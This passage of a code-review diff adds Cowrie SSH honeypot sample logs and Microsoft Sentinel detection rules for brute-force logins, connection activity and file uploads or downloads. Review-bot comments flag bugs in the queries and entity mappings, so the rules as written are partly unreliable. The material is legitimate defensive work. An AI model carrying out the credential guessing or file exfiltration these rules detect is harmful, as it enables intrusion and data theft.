seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:14:26.976765Z"",""src_ip"":""36.138.164.147"",""session"":""b771cfe769f5""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:14:31.221 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":120.00210070610046,""message"":""Connection lost after 120 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:14:31.220373Z"",""src_ip"":""36.138.164.147"",""session"":""9a68e84f7827""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:36:27.205 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""2.228.25.92"",""src_port"":45088,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""440f561391f3"",""protocol"":""ssh"",""message"":""New connection: 2.228.25.92:45088 (10.0.0.4:2222) [session: 440f561391f3]"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:36:27.204603Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:36:27.207 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.000728607177734375,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:36:27.206621Z"",""src_ip"":""2.228.25.92"",""session"":""440f561391f3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:01:09.322 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""104.45.233.189"",""src_port"":47134,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""749c76d5a3c6"",""protocol"":""ssh"",""message"":""New connection: 104.45.233.189:47134 (10.0.0.4:2222) [session: 749c76d5a3c6]"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:01:09.321072Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:01:09.324 PM",,"{""eventid"":""cowrie.client.version"",""version"":""MGLNDD_13.82.122.110_22"",""message"":""Remote SSH version: 
MGLNDD_13.82.122.110_22"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:01:09.322573Z"",""src_ip"":""104.45.233.189"",""session"":""749c76d5a3c6""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:01:09.325 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.002718687057495117,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:01:09.325165Z"",""src_ip"":""104.45.233.189"",""session"":""749c76d5a3c6""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:39:40.055 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""38.88.252.187"",""src_port"":44426,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1a0d25db4b8f"",""protocol"":""ssh"",""message"":""New connection: 38.88.252.187:44426 (10.0.0.4:2222) [session: 1a0d25db4b8f]"",""sensor"":""server01"",""timestamp"":""2024-09-20T15:39:40.054363Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:39:40.129 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.07244014739990234,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T15:39:40.128326Z"",""src_ip"":""38.88.252.187"",""session"":""1a0d25db4b8f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 8:27:55.506 
PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""52.228.167.158"",""src_port"":54022,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""cf66f899f5e3"",""protocol"":""ssh"",""message"":""New connection: 52.228.167.158:54022 (10.0.0.4:2222) [session: cf66f899f5e3]"",""sensor"":""server01"",""timestamp"":""2024-09-20T20:27:55.505219Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 8:27:55.507 PM",,"{""eventid"":""cowrie.client.version"",""version"":""MGLNDD_13.82.122.110_22"",""message"":""Remote SSH version: MGLNDD_13.82.122.110_22"",""sensor"":""server01"",""timestamp"":""2024-09-20T20:27:55.506892Z"",""src_ip"":""52.228.167.158"",""session"":""cf66f899f5e3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 8:27:55.508 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.0014579296112060547,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T20:27:55.508224Z"",""src_ip"":""52.228.167.158"",""session"":""cf66f899f5e3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:53:12.496 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""104.152.52.234"",""src_port"":49147,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""ebbcc72654bf"",""protocol"":""ssh"",""message"":""New connection: 104.152.52.234:49147 (10.0.0.4:2222) [session: ebbcc72654bf]"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:53:12.495310Z""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:53:12.519 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.021689176559448242,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:53:12.518360Z"",""src_ip"":""104.152.52.234"",""session"":""ebbcc72654bf""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:54:50.231 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""52.228.154.149"",""src_port"":40100,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""dfdf6234a1c1"",""protocol"":""ssh"",""message"":""New connection: 52.228.154.149:40100 (10.0.0.4:2222) [session: dfdf6234a1c1]"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:54:50.230597Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:54:50.235 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:54:50.234747Z"",""src_ip"":""52.228.154.149"",""session"":""dfdf6234a1c1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:54:50.273 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""2aec6b44b06bec95d73f66b5d30cb69a"",""hasshAlgorithms"":""curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128""],""macCS"":[""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 2aec6b44b06bec95d73f66b5d30cb69a"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:54:50.271594Z"",""src_ip"":""52.228.154.149"",""session"":""dfdf6234a1c1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:55:00.340 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":10.107726335525513,""message"":""Connection lost after 10 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:55:00.339829Z"",""src_ip"":""52.228.154.149"",""session"":""dfdf6234a1c1""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:32:02.517 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""129.222.103.39"",""src_port"":34808,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""746c2dc4ea94"",""protocol"":""ssh"",""message"":""New connection: 129.222.103.39:34808 (10.0.0.4:2222) [session: 746c2dc4ea94]"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:32:02.516733Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:32:02.857 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.3384232521057129,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:32:02.856500Z"",""src_ip"":""129.222.103.39"",""session"":""746c2dc4ea94""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:07.309 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""192.155.90.118"",""src_port"":45512,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1f933435d66c"",""protocol"":""ssh"",""message"":""New connection: 192.155.90.118:45512 (10.0.0.4:2222) [session: 1f933435d66c]"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:07.307894Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:07.467 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: 
SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:07.466449Z"",""src_ip"":""192.155.90.118"",""session"":""1f933435d66c""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:07.469 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:07.467680Z"",""src_ip"":""192.155.90.118"",""session"":""1f933435d66c""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:07.735 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.42455077171325684,""message"":""Connection lost after 0 
seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:07.734930Z"",""src_ip"":""192.155.90.118"",""session"":""1f933435d66c""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:07.750 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""192.155.90.118"",""src_port"":45528,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""eaba464dec31"",""protocol"":""ssh"",""message"":""New connection: 192.155.90.118:45528 (10.0.0.4:2222) [session: eaba464dec31]"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:07.749835Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:08.010 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:08.009688Z"",""src_ip"":""192.155.90.118"",""session"":""eaba464dec31""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:08.012 
AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:08.010914Z"",""src_ip"":""192.155.90.118"",""session"":""eaba464dec31""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:08.693 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.9419634342193604,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:08.692997Z"",""src_ip"":""192.155.90.118"",""session"":""eaba464dec31""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:08.714 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""192.155.90.118"",""src_port"":45542,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""4654b0bf8b29"",""protocol"":""ssh"",""message"":""New connection: 192.155.90.118:45542 (10.0.0.4:2222) [session: 4654b0bf8b29]"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:08.713752Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:09.129 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:09.128366Z"",""src_ip"":""192.155.90.118"",""session"":""4654b0bf8b29""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:09.131 
AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ssh-ed25519-cert-v01@openssh.com"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:09.129552Z"",""src_ip"":""192.155.90.118"",""session"":""4654b0bf8b29""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:09.926 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":1.2106218338012695,""message"":""Connection lost after 1 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:09.925864Z"",""src_ip"":""192.155.90.118"",""session"":""4654b0bf8b29""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" 
diff --git a/Solutions/Sensor SSH Cowrie/Analytic Rules/AlertonHighNumberofFailedLoginAttempts.yaml b/Solutions/Sensor SSH Cowrie/Analytic Rules/AlertonHighNumberofFailedLoginAttempts.yaml new file mode 100644 index 00000000000..110a53cda43 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Analytic Rules/AlertonHighNumberofFailedLoginAttempts.yaml @@ -0,0 +1,34 @@ +id: ccbfc8aa-d1fe-4f62-b192-67f6c4edc9a2 +name: Alert on High Number of Failed Login Attempts +description: | + 'Detect brute-force or password-guessing attacks by monitoring a high volume of failed login attempts.' +severity: Medium +status: Available +requiredDataConnectors: + - connectorId: SensorSSHCowrie + dataTypes: + - newCowrie_CL +queryFrequency: 5m +queryPeriod: 5m +triggerOperator: gt +triggerThreshold: 0 +tactics: + - CredentialAccess +relevantTechniques: + - T1110 +query: | + newCowrie_CL + | extend EventID = tostring(parse_json(RawData).eventid) + | extend SourceIP = tostring(parse_json(RawData).src_ip) + | where EventID == "cowrie.login.failed" + | summarize FailedAttempts = count() by SourceIP + | where FailedAttempts > 2 + | project SourceIP, FailedAttempts + | order by FailedAttempts desc +entityMappings: + - entityType: IP + fieldMappings: + - identifier: Address + columnName: SourceIP +version: 1.0.1 +kind: Scheduled \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectConnectionEvents.yaml b/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectConnectionEvents.yaml new file mode 100644 index 00000000000..9b2a3a5766b --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectConnectionEvents.yaml 
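Review bot: Each column is extracted with its own `parse_json(RawData)` call (twice here, six times in DetectFileUploadsandDownloads.yaml), so the same string is re-parsed once per field on every row; parse once with `| extend Event = parse_json(RawData)` and read `tostring(Event.eventid)` / `tostring(Event.src_ip)` from it. The same pattern appears in the hunks for DetectConnectionEvents.yaml, DetectFileUploadsandDownloads.yaml, DetectSuspiciousFileDownloads.yaml and MonitorUnusualFileExecution.yaml. Separately, the `summarize` groups only by SourceIP, so an incident carries no indication of which accounts were being guessed; if Cowrie's login.failed events carry a username field (none are visible in the sample data on this page), adding `make_set(Username)` to the summarize and an Account entity mapping would make triage quicker.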
@@ -0,0 +1,31 @@ +id: 4a566fa4-f901-44fd-9890-a476d163e86a +name: Detect Connection Events +description: | + 'Track connection events to detect unusual patterns in access or possible reconnaissance activity.' +severity: Medium +status: Available +requiredDataConnectors: + - connectorId: SensorSSHCowrie + dataTypes: + - newCowrie_CL +queryFrequency: 5m +queryPeriod: 5m +triggerOperator: gt +triggerThreshold: 0 +tactics: + - Discovery +relevantTechniques: + - T0840 +query: | + newCowrie_CL + | extend EventID = tostring(parse_json(RawData).eventid) + | extend SourceIP = tostring(parse_json(RawData).src_ip) + | where EventID == "cowrie.session.closed" + | project SourceIP +entityMappings: + - entityType: IP + fieldMappings: + - identifier: Address + columnName: SourceIP +version: 1.0.1 +kind: Scheduled \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectFileUploadsandDownloads.yaml b/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectFileUploadsandDownloads.yaml new file mode 100644 index 00000000000..cf39eaac993 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectFileUploadsandDownloads.yaml 
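Review bot: With `triggerThreshold: 0` and no aggregation, this rule opens an incident for every `cowrie.session.closed` row in each 5-minute window, and the sample data added in this same commit shows an Internet-facing sensor closing sessions many times a day, so the rule will mirror the table into the incident queue rather than surface the "unusual patterns" its description promises. Summarizing per source — `| summarize Sessions = count(), FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by SourceIP` — and thresholding on `Sessions` would turn it into an actual detection. The technique id `T0840` comes from the ATT&CK for ICS matrix; confirm the schema validator accepts it for a Discovery tactic on an SSH sensor, where T1046 (or T1595 under Reconnaissance) is the more usual tag.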
@@ -0,0 +1,49 @@ +id: 53016cac-ca6c-4b2b-a4c4-7325afcb9502 +name: Detect File Uploads and Downloads +description: | + 'Monitor file uploads and downloads to detect potential exfiltration or data theft activities.' +severity: Medium +status: Available +requiredDataConnectors: + - connectorId: SensorSSHCowrie + dataTypes: + - newCowrie_CL +queryFrequency: 5m +queryPeriod: 5m +triggerOperator: gt +triggerThreshold: 0 +tactics: + - LateralMovement +relevantTechniques: + - T0843 +query: | + newCowrie_CL + | extend EventID = tostring(parse_json(RawData).eventid) + | extend URL = tostring(parse_json(RawData).url) + | extend SourceIP = tostring(parse_json(RawData).src_ip) + | extend Sha256Value = tostring(parse_json(RawData).shasum) + | extend Message = tostring(parse_json(RawData).message) + | extend Outfile = tostring(parse_json(RawData).outfile) + | where EventID in ("cowrie.session.file_upload", "cowrie.session.file_download") + | project EventID, SourceIP, URL, Outfile, Sha256Value +entityMappings: + - entityType: IP + fieldMappings: + - identifier: Address + columnName: SourceIP + - entityType: File + fieldMappings: + - identifier: Name + columnName: Outfile + - entityType: FileHash + fieldMappings: + - identifier: Value + columnName: Sha256Value + - identifier: Algorithm + columnName: Message + - entityType: URL + fieldMappings: + - identifier: Url + columnName: URL +version: 1.0.1 +kind: Scheduled \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectSuspiciousFileDownloads.yaml b/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectSuspiciousFileDownloads.yaml new file mode 100644 index 00000000000..d18ea00fc55 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectSuspiciousFileDownloads.yaml 
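Review bot: The FileHash mapping points `identifier: Algorithm` at `columnName: Message`, but `Message` is Cowrie's free-text message rather than an algorithm name, and it is not in the final `project`, so the mapping references a column the query no longer emits. Because the hash comes from `shasum` (already named Sha256Value), set the algorithm as a constant instead: `| extend HashAlgorithm = "SHA256"`, add `HashAlgorithm` to the `project`, and map `Algorithm` to `columnName: HashAlgorithm`; the unused `Message` extend can then be removed. The pairing LateralMovement / T0843 (an ICS-matrix id) also reads oddly for files pulled onto a honeypot — Command and Control / T1105 for downloads and Exfiltration for uploads match the description better, subject to what the schema validator allows.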
